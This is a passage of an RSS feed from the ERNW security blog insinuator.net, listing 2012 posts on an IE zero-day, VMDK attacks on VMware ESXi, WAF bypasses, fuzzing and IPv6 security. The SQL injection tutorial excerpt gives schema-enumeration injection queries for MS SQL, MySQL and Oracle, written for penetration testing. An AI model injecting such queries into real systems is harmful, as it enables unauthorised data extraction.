      <description>&lt;p&gt;Actually a Windows Vulnerability (&lt;a href=&#34;http://technet.microsoft.com/en-us/security/advisory/2757760&#34;&gt;Microsoft Advisory 2757760&lt;/a&gt;) related to the Internet Explorer Version 7, 8 and 9 is in the news. Microsoft is aware of the problem, but there’s no patch available yet. We call this a 0-Day :-). Making the problem even worse, on monday reliable &lt;a href=&#34;https://community.rapid7.com/community/metasploit/blog/2012/09/17/lets-start-the-week-with-a-new-internet-explorer-0-day-in-metasploit&#34;&gt;exploit code&lt;/a&gt; was released within the Metasploit project, so exploit code is already in the wild.&lt;/p&gt;&#xA;&lt;p&gt;Basically Microsoft suggests two workarounds:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Usage of EMET &lt;a href=&#34;http://support.microsoft.com/kb/2458544&#34;&gt;(Enhanced Mitigation Experience Toolkit&lt;/a&gt;)&lt;/li&gt;&#xA;&lt;li&gt;Disabling Active X and Active Scripting in the Internet Settings&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;But both of them have some impact: EMET must be deployed before any usage (btw. EMET can be configured via Group Policies) and disabling Active X and Active Scripting might break some business relevant web sites (that can be added to the “Trusted Sites” Zone, but might produce major operational effort).&lt;/p&gt;</description>
    </item>
    <item>
      <title>VMDK Has Left the Building – Write Access</title>
      <link>https://insinuator.net/2012/09/vmdk-has-left-the-building-write-access/</link>
      <pubDate>Wed, 05 Sep 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/09/vmdk-has-left-the-building-write-access/</guid>
      <description>&lt;p&gt;In our last series of posts regarding the VMDK file inclusion attack, we focused on &lt;a href=&#34;http://www.insinuator.net/2012/05/vmdk-has-left-the-building/&#34;&gt;read access&lt;/a&gt; and &lt;a href=&#34;http://www.insinuator.net/2012/05/vmdk-has-left-the-building-follow-up/&#34;&gt;prerequisites&lt;/a&gt; for the attack, but avoided stating too much about potential write access. But as we promised to cover write access in the course of our future research, the following post will describe our latest research results.&lt;/p&gt;&#xA;&lt;p&gt;First of all, the same &lt;a href=&#34;http://www.insinuator.net/2012/05/vmdk-has-left-the-building-follow-up/&#34;&gt;prerequisites&lt;/a&gt; (which will be refined a little bit more later on) as for read access must be fulfilled and the same &lt;a href=&#34;http://www.insinuator.net/2012/05/vmdk-has-left-the-building/&#34;&gt;steps&lt;/a&gt; have to be performed in order to carry out the attack successfully. If that is the case, there are several POIs (Partitions Of Interest) on a ESXi hypervisor that are interesting to include:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Windows Server 2008 R2 BSI-compliance</title>
      <link>https://insinuator.net/2012/07/windows-server-2008-r2-bsi-compliance/</link>
      <pubDate>Thu, 26 Jul 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/07/windows-server-2008-r2-bsi-compliance/</guid>
      <description>&lt;p&gt;Recommendations by the &lt;a href=&#34;https://www.bsi.bund.de/EN/Home/home_node.html&#34;&gt;German Federal Office for Information Security&lt;/a&gt; (&lt;em&gt;BSI – Bundesamt für Sicherheit in der Informationstechnik&lt;/em&gt;) are obligatory for German government agencies, civil services and authorities (like recommendations of the NIST are relevant to American government agencies and authorities). They are often used as references and security best practices in other countries as well. Hence it is hard to understand why the recommendations on how to harden Windows Server &lt;strong&gt;2008&lt;/strong&gt; based systems were published only some weeks ago and only on a preliminary draft basis (which is, obviously, better than nothing ;-)).&lt;/p&gt;</description>
    </item>
    <item>
      <title>A First Glance – RA Guard Support in Hyper-V 3.0</title>
      <link>https://insinuator.net/2012/07/a-first-glance-ra-guard-support-in-hyper-v-3.0/</link>
      <pubDate>Tue, 24 Jul 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/07/a-first-glance-ra-guard-support-in-hyper-v-3.0/</guid>
      <description>&lt;p&gt;Last week I read about the new networking features of the integrated vSwitch of Hyper-V 3.0. I was quite surprised that RA Guard will be natively supported and was curious about implementation and functionality. If you don’t know how RA Guard  works, I recommend reading our previous blog posts &lt;a href=&#34;http://www.insinuator.net/2011/01/ipv6-security-part-1-ra-guard-the-theory-3/&#34;&gt;here&lt;/a&gt;, &lt;a href=&#34;http://www.insinuator.net/2011/03/ipv6-security-part-2-ra-guard-%E2%80%93-lets-get-practical/&#34;&gt;here&lt;/a&gt;, &lt;a href=&#34;http://www.insinuator.net/2011/03/ipv6-security-%E2%80%92-the-story-continues/&#34;&gt;here&lt;/a&gt;, &lt;a href=&#34;http://www.insinuator.net/2011/05/yet-another-update-on-ipv6-security-some-notes-from-the-ipv6-kongress-in-frankfurt/&#34;&gt;here&lt;/a&gt; and &lt;a href=&#34;http://www.insinuator.net/2012/03/the-story-continues-another-ipv6-update/&#34;&gt;here&lt;/a&gt;, or have a look at our workshop at &lt;a href=&#34;http://www.troopers.de/archives/troopers12/agenda/advanced-ipv6-security-workshop/&#34;&gt;Troopers12&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;I downloaded Windows Server 2012 RC to do some practical testing. Since my girlfriend was working the whole weekend, I had plenty of time to play around with all that stuff without risking trouble 😉&lt;/p&gt;</description>
    </item>
    <item>
      <title>DAY-CON VI</title>
      <link>https://insinuator.net/2012/07/day-con-vi/</link>
      <pubDate>Sat, 21 Jul 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/07/day-con-vi/</guid>
      <description>&lt;p&gt;As &lt;a href=&#34;http://www.insinuator.net/2011/10/packetwars-sun-skills/&#34;&gt;every year&lt;/a&gt;, we will be attending &lt;a href=&#34;http://day-con.org&#34;&gt;Day-Con&lt;/a&gt;, a one-day security summit in Dayton, OH — this year for its VIth edition. Even though the actual conference comprises “only” one day full with talks and discussions (please find the agenda &lt;a href=&#34;http://day-con.org/SCHEDULE_%26_SPEAKERS.html&#34;&gt;here&lt;/a&gt;), the overall event consists of &lt;a href=&#34;http://day-con.org/pooh2012.pdf&#34;&gt;trainings&lt;/a&gt; before the conference and &lt;a href=&#34;http://packetwars.com/&#34;&gt;PacketWars&lt;/a&gt; battles (including an infamous party) afterwards. Since we will be leading and attending some of the training sessions, those might be of particular interest for people who missed our &lt;a href=&#34;http://www.troopers.de/archives/troopers12/agenda/&#34;&gt;Troopers workshops&lt;/a&gt; — so you don’t have to wait a whole year but get another chance in October 😉&lt;/p&gt;</description>
    </item>
    <item>
      <title>The Web Application Firewall Story continues</title>
      <link>https://insinuator.net/2012/06/the-web-application-firewall-story-continues/</link>
      <pubDate>Fri, 22 Jun 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/06/the-web-application-firewall-story-continues/</guid>
      <description>&lt;p&gt;Some days ago another &lt;a href=&#34;https://www.sec-consult.com/files/20120618-1_Airlock_WAF_overlong_UTF8_bypass.txt&#34;&gt;advisory&lt;/a&gt; related to a web application firewall (WAF) product was published. This time the product Airlock by &lt;a href=&#34;http://www.ergon.ch/&#34;&gt;Ergon&lt;/a&gt; was affected by a vulnerability that combines Encoding and NULL Byte attacks to circumvent the pattern based detection engine. We have described these attacks in detail in our newsletter “&lt;a href=&#34;http://www.ernw.de/content/e15/e28/e1659/download1661/ERNW_Newsletter_35_WAF_en_ger.pdf&#34;&gt;Web Application Firewall Security and The Swiss Army Knife for Web Application Firewalls&lt;/a&gt;” because they belong to a well known category of attacks against WAFs.&lt;/p&gt;</description>
    </item>
    <item>
      <title>VMDK Has Left the Building — FAQ</title>
      <link>https://insinuator.net/2012/06/vmdk-has-left-the-building-faq/</link>
      <pubDate>Sun, 17 Jun 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/06/vmdk-has-left-the-building-faq/</guid>
      <description>&lt;p&gt;As we are receiving a lot of questions about our &lt;a href=&#34;http://www.insinuator.net/2012/05/vmdk-has-left-the-building/&#34;&gt;VMDK has left the building post&lt;/a&gt;, we’re compiling this FAQ post — which will be updated as our research goes on.&lt;/p&gt;&#xA;&lt;p&gt;** **&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;How does the attack essentially work?&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;&lt;em&gt;By bringing a specially crafted VMDK file into a VMware ESXi based virtualization environment. The specific attack path is described &lt;a href=&#34;http://www.insinuator.net/2012/05/vmdk-has-left-the-building-follow-up/&#34;&gt;here&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;&#xA;&lt;p&gt;* *&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;What is a VMDK file?&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;&lt;em&gt;A combination of two different types of VMDK files, the plain-text descriptor file containing meta data and the actual binary disk file, describes a VMware virtual hard disk. A detailed description can be found &lt;a href=&#34;http://www.insinuator.net/2012/05/vmdk-has-left-the-building/&#34;&gt;here&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>SQL Injection Testing for Business Purposes Part 3</title>
      <link>https://insinuator.net/2012/06/sql-injection-testing-for-business-purposes-part-3/</link>
      <pubDate>Wed, 13 Jun 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/06/sql-injection-testing-for-business-purposes-part-3/</guid>
      <description>&lt;h2 id=&#34;extract-the-data&#34;&gt;Extract the data&lt;/h2&gt;&#xA;&lt;p&gt;If you want to extract some data from a database you first need to gather knowledge about the internal structure of the database.&lt;/p&gt;&#xA;&lt;p&gt;One of the first steps (after determining the database type) is enumerating the available tables and the corresponding columns. Most database systems have a meta database called information_schema. By querying this database it is possible to get information about the internal structure of the installed databases. For example you could get the tables and their corresponding columns in MS SQL and MySQL by injecting “&lt;code&gt;SELECT table_name, column_name FROM information_schema.columns&lt;/code&gt;“. Oracle databases have their own meta tables, so you have to handle them differently. For getting the same output in Oracle, you have to query the all_tab_columns table (or user_tab_columns if you only want to search in the currently selected database). If the found vulnerability only allows to receive a single column (or if it is too complicated to identify two columns in the server response) you could concatenate the columns to one single string, e.g. in Oracle: “&lt;code&gt;SELECT table_name||&#39;:&#39;||column_name FROM all_tab_columns&lt;/code&gt;“.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Fuzzing VMDK files</title>
      <link>https://insinuator.net/2012/05/fuzzing-vmdk-files/</link>
      <pubDate>Wed, 30 May 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/05/fuzzing-vmdk-files/</guid>
      <description>&lt;p&gt;As announced at last week’s &lt;a href=&#34;http://conference.hitb.org/hitbsecconf2012ams/&#34;&gt;#HITB2012AMS&lt;/a&gt;, I’ll describe the fuzzing steps which were performed during our initial research. The very first step was the definition of the interfaces we wanted to test. We decided to go with the plain text VMDK file, as this is the main virtual disk description file and in most deployment scenarios user controlled, and the data part of a special kind of VMDK files, the &lt;em&gt;Host Sparse Extends&lt;/em&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>SQL Injection Testing for Business Purposes Part 2</title>
      <link>https://insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-2/</link>
      <pubDate>Mon, 28 May 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-2/</guid>
      <description>&lt;h2 id=&#34;take-care-of-the-database&#34;&gt;Take Care of the Database&lt;/h2&gt;&#xA;&lt;p&gt;There are some database specifics, every pentester should be aware of, when testing for and exploiting SQLi vulnerabilities. Besides the different string concatenation variants already covered above, there are some other specifics that have to be considered and might turn out useful in some circumstances. For example with Oracle Databases, every SELECT statement needs a following FROM statement even if the desired data is not stored within a database. So when trying to extract e.g. the DB username using a UNION SELECT statement, the DUAL table may be utilized, which should always be available. Another point, if dealing with MySQL, is the possibility to simplify the classic payload&lt;/p&gt;</description>
    </item>
    <item>
      <title>VMDK Has Left the Building – Slides available</title>
      <link>https://insinuator.net/2012/05/vmdk-has-left-the-building-slides-available/</link>
      <pubDate>Fri, 25 May 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/05/vmdk-has-left-the-building-slides-available/</guid>
      <description>&lt;p&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2012/05/HITB_talk.jpg&#34; alt=&#34;&#34; title=&#34;HITB_talk&#34;&gt;A quick update on the workshop we’ve just finished at &lt;a href=&#34;http://conference.hitb.org/hitbsecconf2012ams/&#34;&gt;Hack in the Box 2012 Amsterdam&lt;/a&gt;:&lt;br&gt;&#xA;Due to popular demand we decided to bring the slides online without wasting any more time. The official website of the conference is currently experiencing some problems due to high interest in all the stuff what was released in the last two days. Great conference!&lt;/p&gt;&#xA;&lt;p&gt;Here you go: &lt;a href=&#34;http://www.insinuator.net/wp-content/uploads/2012/11/HITB_AMS_2012_ERNW_VMDK_v1.0_release.pdf&#34;&gt;HITB2012AMS ERNW VMDK Has Left the Building&lt;/a&gt; [PDF, 6MB, link fixed]&lt;/p&gt;</description>
    </item>
    <item>
      <title>VMDK Has Left the Building — Some Nasty Attacks Against VMware vSphere 5 Based Cloud Infrastructures</title>
      <link>https://insinuator.net/2012/05/vmdk-has-left-the-building-some-nasty-attacks-against-vmware-vsphere-5-based-cloud-infrastructures/</link>
      <pubDate>Thu, 24 May 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/05/vmdk-has-left-the-building-some-nasty-attacks-against-vmware-vsphere-5-based-cloud-infrastructures/</guid>
      <description>&lt;p&gt;&lt;strong&gt;Update #1:&lt;/strong&gt; Slides are available for download &lt;a href=&#34;http://www.insinuator.net/2012/05/vmdk-has-left-the-building-slides-available/&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;In the course of our ongoing &lt;a href=&#34;http://www.troopers.de/archives/troopers12/agenda/auditing-the-cloud-workshop/&#34;&gt;cloud security research&lt;/a&gt;, we’re continuously thinking about potential attack vectors against public cloud infrastructures. Approaching this enumeration from an external customer’s (speak: attacker’s 😉 ) perspective, there are the following possibilities to communicate with and thus send malicious input to typical cloud infrastructures:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Management interfaces&lt;/li&gt;&#xA;&lt;li&gt;Guest/hypervisor interaction&lt;/li&gt;&#xA;&lt;li&gt;Network communication&lt;/li&gt;&#xA;&lt;li&gt;File uploads&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;As there are already several successful exploits against management interfaces (e.g. &lt;a href=&#34;http://www.nds.rub.de/media/nds/veroeffentlichungen/2011/10/22/AmazonSignatureWrapping.pdf&#34;&gt;here&lt;/a&gt; and &lt;a href=&#34;http://www.insinuator.net/2011/07/the-key-to-your-datacenter/&#34;&gt;here&lt;/a&gt;) and guest/hypervisor interaction (see for example &lt;a href=&#34;http://www.vmware.com/security/advisories/VMSA-2012-0009.html&#34;&gt;this one&lt;/a&gt;; yes, this is the funny one with that ridiculous recommendation “Do not allow untrusted users access to your virtual machines.” ;-)), we’re focusing on the upload of files to cloud infrastructures in this post. According to our experience with major &lt;em&gt;Infrastructure-as-a-Service&lt;/em&gt; (IaaS) cloud providers, the most relevant file upload possibility is the deployment of already existing virtual machines to the provided cloud infrastructure. However, since a quick additional research shows that most of those allow the upload of VMware-based virtual machines and, to the best of our knowledge, the VMware virtualization file format was not analyzed as for potential vulnerabilities yet, we want to provide an analysis of the relevant file types and present resulting attack vectors.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Releasing dizzy version 0.6</title>
      <link>https://insinuator.net/2012/05/releasing-dizzy-version-0.6/</link>
      <pubDate>Wed, 23 May 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/05/releasing-dizzy-version-0.6/</guid>
      <description>&lt;p&gt;Hi @all,&lt;br&gt;&#xA;today im releasing a new version of our famous fuzzing framework, dizzy. The version counts 0.6 by now and youll get some brand new features!&lt;/p&gt;&#xA;&lt;p&gt;see the CHANGELOG:&lt;br&gt;&#xA;v0.6:&lt;br&gt;&#xA;– ssl support&lt;br&gt;&#xA;– server side fuzzing mode&lt;br&gt;&#xA;– command output&lt;br&gt;&#xA;– new dizz funktions: lambda_length, csum, lambda_csum, lambda2_csum&lt;br&gt;&#xA;– recursive mutation mode&lt;br&gt;&#xA;– new dizz objects: fill&lt;br&gt;&#xA;– new interaction objects: null_dizz&lt;br&gt;&#xA;– reconnect option&lt;br&gt;&#xA;– additional fuzzing values&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Privacy Extensions</title>
      <link>https://insinuator.net/2012/05/ipv6-privacy-extensions/</link>
      <pubDate>Mon, 14 May 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/05/ipv6-privacy-extensions/</guid>
      <description>&lt;p&gt;Last week Christopher Werny and I gave a talk on IPv6 Privacy Extensions at the &lt;a href=&#34;http://www.ipv6-kongress.de/&#34;&gt;Heise IPv6 Kongress&lt;/a&gt;. As our slides were not included in the event’s material &lt;a href=&#34;http://ernw.de/download/ERNW_Privacy_Extensions.pdf&#34;&gt;here’s the presentation’s slide deck&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;As &lt;a href=&#34;http://www.insinuator.net/2011/05/yet-another-update-on-ipv6-security-some-notes-from-the-ipv6-kongress-in-frankfurt/&#34;&gt;in 2011&lt;/a&gt; we really liked the conference; there was a number of interesting talks and we met quite some fellows from the IPv6 security space. Btw: we plan to organize a dedicated IPv6 security summit in late 2012 (probably on 6th and 7th of November) in Heidelberg, similar to the &lt;a href=&#34;http://www.troopers.de/archives/troopers12/agenda/telcosec-day/&#34;&gt;Telco Sec Day&lt;/a&gt; at Troopers. We’ll annouce details as for this one in some weeks.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Slides from Troopers Telco Sec Day Online</title>
      <link>https://insinuator.net/2012/05/slides-from-troopers-telco-sec-day-online/</link>
      <pubDate>Mon, 14 May 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/05/slides-from-troopers-telco-sec-day-online/</guid>
      <description>&lt;p&gt;As I mentioned the Telco Sec Day in the last post… for those who missed Flo’s announcement: in the interim all slides of the Telco Sec Day are available online &lt;a href=&#34;http://www.troopers.de/archives/troopers12/downloads/&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Obviously, given I initiated the event, I’m biased 😉 but to me it provided great insight from both the talks and the networking with other guys from the telco security field, and it did actually what it was meant for: fostering the exchange between different players in that space, for the sake of sustainably improving its’ overall security posture.&lt;/p&gt;</description>
    </item>
    <item>
      <title>SQL Injection Testing for Business Purposes Part 1</title>
      <link>https://insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-1/</link>
      <pubDate>Mon, 14 May 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-1/</guid>
      <description>&lt;h2 id=&#34;introduction&#34;&gt;Introduction&lt;/h2&gt;&#xA;&lt;p&gt;SQL injection attacks have been well known for a long time and many people think that developers should have fixed these issues years ago, but doing web application pentests almost all the time, we have a slightly different view. Many SQL injection problems  potentially remain undetecteddue to a lack of proper test methodology, so we would like to share our approach and experience and help others in identifying these issues.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Untrusted code or why exploit code should only be executed by professionals</title>
      <link>https://insinuator.net/2012/04/untrusted-code-or-why-exploit-code-should-only-be-executed-by-professionals/</link>
      <pubDate>Sun, 22 Apr 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/04/untrusted-code-or-why-exploit-code-should-only-be-executed-by-professionals/</guid>
      <description>&lt;p&gt;In march 2012 Microsoft announced a critical vulnerability (&lt;a href=&#34;http://technet.microsoft.com/en-us/security/bulletin/ms12-020&#34;&gt;Microsoft Security Bulletin MS12-020&lt;/a&gt;) related to RDP that affects all windows operating systems and allows remote code execution. A lot of security professionals are expecting almost the same impact as with MS08-067 (the conficker vulnerability) and that it will be only a matter of time, until we will spot reliable exploits in the wild. Only a few days later an exploit, working for all unpatched windows versions was released, so it seems that they were right ;-), but of course no one will run an exploit without investigating the code. So lets have a look into the exploit Code.&lt;/p&gt;</description>
    </item>
    <item>
      <title>The 5 Myths of Web Application Firewalls</title>
      <link>https://insinuator.net/2012/04/the-5-myths-of-web-application-firewalls/</link>
      <pubDate>Mon, 16 Apr 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/04/the-5-myths-of-web-application-firewalls/</guid>
      <description>&lt;p&gt;Some days ago a security advisory related to web application firewalls (WAFs) was published on Full Disclosure. Wendel Guglielmetti Henrique found another bug in the IBM Web Application Firewall which can be used to circumvent the WAF and execute typical web application attacks like SQL injection (click &lt;a href=&#34;http://lists.grok.org.uk/pipermail/full-disclosure/2011-June/081605.html&#34;&gt;here&lt;/a&gt; for details). Wendel talked already (look &lt;a href=&#34;http://troopers09.org/content/e644/e649/TROOPERS09_gauci_henrique_web_application_firewalls.pdf%20&#34;&gt;here&lt;/a&gt;) at the &lt;a href=&#34;http://www.troopers.de&#34;&gt;Troopers&lt;/a&gt; Conference in 2009 about the different techniques to identify and bypass WAFs, so this kind of bypass methods are not quite new.&lt;/p&gt;</description>
    </item>
    <item>
      <title>The Story Continues – Another IPv6 Update</title>
      <link>https://insinuator.net/2012/03/the-story-continues-another-ipv6-update/</link>
      <pubDate>Fri, 30 Mar 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/03/the-story-continues-another-ipv6-update/</guid>
      <description>&lt;p&gt;TROOPERS12 came to an end last week on Friday; needless to say it was an awesome  event. 😉&lt;br&gt;&#xA;The first two days offered workshops on various topics. On Monday Enno, &lt;a href=&#34;http://mhsec.de/&#34;&gt;Marc “Van Hauser” Heuse&lt;/a&gt; and I gave a one day workshop on “Advanced IPv6 Security”.  I think attendees as well as trainers had a real good time during and after the workshop fiddling around with IPv6. Especially Marc had quite some fun as he discovered that we provided “global” IPv6 Connectivity for the conference network, and according to one of his tweets, TROOPERS12 was the first security conference he visited, offering this kind of connectivity.&lt;/p&gt;</description>
    </item>
    <item>
      <title>A Comment on Android PIN bypass</title>
      <link>https://insinuator.net/2012/03/a-comment-on-android-pin-bypass/</link>
      <pubDate>Thu, 22 Mar 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/03/a-comment-on-android-pin-bypass/</guid>
      <description>&lt;p&gt;Lately there have been some rumors on the full-disclosure mailing list referring to a blogpost of  Hatforce about a new method to bypass the PIN/password lock on Android Gingerbread phones.&lt;br&gt;&#xA;The approach was to boot into the Recovery Mode and execute a reset to factory state. The ideal result should be a reliable wipe of the /data partition. However, the author managed to recover data after the wiping process. This has been stated as a method on extracting sensitive date without knowing the actual pin or passcode.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers TelcoSecDay</title>
      <link>https://insinuator.net/2012/03/troopers-telcosecday/</link>
      <pubDate>Sat, 17 Mar 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/03/troopers-telcosecday/</guid>
      <description>&lt;p&gt;As there has been some public demand for that, here we go with the final agenda for the Troopers “&lt;a href=&#34;http://www.troopers.de/troopers12/agenda/telcosec-day/&#34;&gt;TelcoSecDay&lt;/a&gt;“. The workshop is meant to provide a platform for research exchange between operators, vendors and researchers. The slides of the talks will potentially be made available as well.&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;8:30: Opening Remarks &amp;amp; Introduction&lt;/li&gt;&#xA;&lt;li&gt;9:00: Sebastian Schrittwieser (SBA Research): Guess Who’s Texting You? Evaluating the Security of Smartphone Messaging Applications.&lt;/li&gt;&#xA;&lt;li&gt;10:00: Peter Schneider (NSN): How to secure an LTE-Network: Just applying the 3GPP security standards and that’s it?&lt;/li&gt;&#xA;&lt;li&gt;10:45: Break&lt;/li&gt;&#xA;&lt;li&gt;11:00: Kevin Redon (T-Labs): Weaponizing Femtocells – The Effect of Rogue Devices on Mobile Telecommunications&lt;/li&gt;&#xA;&lt;li&gt;11:45: Christian Kagerhuber (Group IT Security, Deutsche Telekom AG): Security Compliance Audit Automation (SCA, TeleManagementForum TMF528)&lt;/li&gt;&#xA;&lt;li&gt;12:30: Lunch&lt;/li&gt;&#xA;&lt;li&gt;13:45: Philipp Langlois (P1 Security): Assault on the GRX (GPRS Roaming eXchange) from the Telecom Core Network perspective, from 2.5G to LTE Advanced.&lt;/li&gt;&#xA;&lt;li&gt;15:00: Break&lt;/li&gt;&#xA;&lt;li&gt;15:15: Harald Welte (sysmocom): Structural deficits in telecom security&lt;/li&gt;&#xA;&lt;li&gt;16:30: Closing Remarks&lt;/li&gt;&#xA;&lt;li&gt;17:00: End of workshop&lt;/li&gt;&#xA;&lt;li&gt;19:00: Joint dinner (hosted by ERNW) in Heidelberg Altstadt for those interested and/or staying for the main conference&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;====&lt;/p&gt;</description>
    </item>
    <item>
      <title>ERP Platforms Are Vulnerable</title>
      <link>https://insinuator.net/2012/03/erp-platforms-are-vulnerable/</link>
      <pubDate>Thu, 08 Mar 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/03/erp-platforms-are-vulnerable/</guid>
      <description>&lt;p&gt;&lt;em&gt;&lt;strong&gt;This is a guest post by the SAP security expert Juan Pablo Perez-Etchegoyen, CTO of  Onapsis. Enjoy reading:&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;&#xA;&lt;p&gt;At &lt;a href=&#34;http://www.onapsis.com/&#34;&gt;Onapsis&lt;/a&gt; we are continuously researching in the ERP security field to identify the risks that ERP systems and business-critical applications are exposed to. This way we help customers and vendors to increase their security posture and mitigate threats that may be affecting their most important platform: the one that stores and manages their business’ crown jewels.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Applying the ERNW Seven Sisters Approach to VoIP Networks</title>
      <link>https://insinuator.net/2012/03/applying-the-ernw-seven-sisters-approach-to-voip-networks/</link>
      <pubDate>Sat, 03 Mar 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/03/applying-the-ernw-seven-sisters-approach-to-voip-networks/</guid>
      <description>&lt;p&gt;Hi,&lt;/p&gt;&#xA;&lt;p&gt;if you’re following this blog regularly or if you’ve ever attended an &lt;a href=&#34;http://www.hmtrainingsolutions.com/&#34;&gt;ERNW-led workshop&lt;/a&gt; which included an “architecture section” you will certainly remember the “Seven Sisters of Infrastructure Security” stuff (used for example in &lt;a href=&#34;http://www.insinuator.net/2011/01/ipv6-security-part-1-ra-guard-the-theory-3/&#34;&gt;this post&lt;/a&gt;). These are a number of (well, more precisely, it’s seven ;-)) fundamental security principles which can be applied to any complex infrastructure, be that a network, a building, an airport or the like.&lt;/p&gt;&#xA;&lt;p&gt;As part of our upcoming &lt;a href=&#34;https://www.blackhat.com/html/bh-eu-12/bh-eu-12-briefings.html#rey&#34;&gt;Black Hat&lt;/a&gt; and &lt;a href=&#34;http://www.troopers.de/troopers12/agenda/protecting-voice-over-ip-in-2012/&#34;&gt;Troopers&lt;/a&gt; talks we will apply those principles to some VoIP networks we (security-) assessed and, given we won’t cover them in detail there, it might be helpful to perform a quick refresher of them, together with an initial application to VoIP deployments. Here we go; these are the “Seven Sisters of Infrastructure Security”:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Sell Your Own Device – A Field Study on Decommissioning of Mobile Devices</title>
      <link>https://insinuator.net/2012/02/sell-your-own-device-a-field-study-on-decommissioning-of-mobile-devices/</link>
      <pubDate>Tue, 28 Feb 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/02/sell-your-own-device-a-field-study-on-decommissioning-of-mobile-devices/</guid>
      <description>&lt;p&gt;On Friday we released our latest technical newsletter with the fancy title &lt;em&gt;“Sell Your Own Device – A Field Study on Decommissioning of Mobile Devices”&lt;/em&gt;. It is the result of a field study on decommissioned mobile business devices bought on eBay and about how stored data may be extracted in different ways.&lt;/p&gt;&#xA;&lt;p&gt;As always we love to share plenty of practical advise: At the end of the newsletter you will find the mitigating controls to securely handle mobile devices at the end of their life cycle process.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Groundhog Day: Don’t Pay Money for Some Else’s Calls, Still</title>
      <link>https://insinuator.net/2012/02/groundhog-day-dont-pay-money-for-some-elses-calls-still/</link>
      <pubDate>Fri, 24 Feb 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/02/groundhog-day-dont-pay-money-for-some-elses-calls-still/</guid>
      <description>&lt;p&gt;Hi everyone,&lt;br&gt;&#xA;it’s me again with another story of a toll fraud incident at one of our customers (not the same as &lt;a href=&#34;http://www.insinuator.net/2012/02/dont-pay-money-for-someone-elses-calls-again/&#34; title=&#34;Don’t Pay Money for Someone Else’s Calls, Again&#34;&gt;the last time&lt;/a&gt; of course ;-)).&lt;br&gt;&#xA;The story began basically like the last one: We received a call with an urgent request to help investigating a toll fraud issue. Like the last time I visited the site in order to get an idea on what was going on exactly. The customer has a VoIP deployment consisting of the whole UC Suite Cisco offers: Call Manager, Unity Connection for the voice mailboxes, Cisco based Voice-Gateways and of course, IP phones.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Assesment of Visual Voicemail on iPhones</title>
      <link>https://insinuator.net/2012/02/assesment-of-visual-voicemail-on-iphones/</link>
      <pubDate>Wed, 22 Feb 2012 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2012/02/assesment-of-visual-voicemail-on-iphones/</guid>
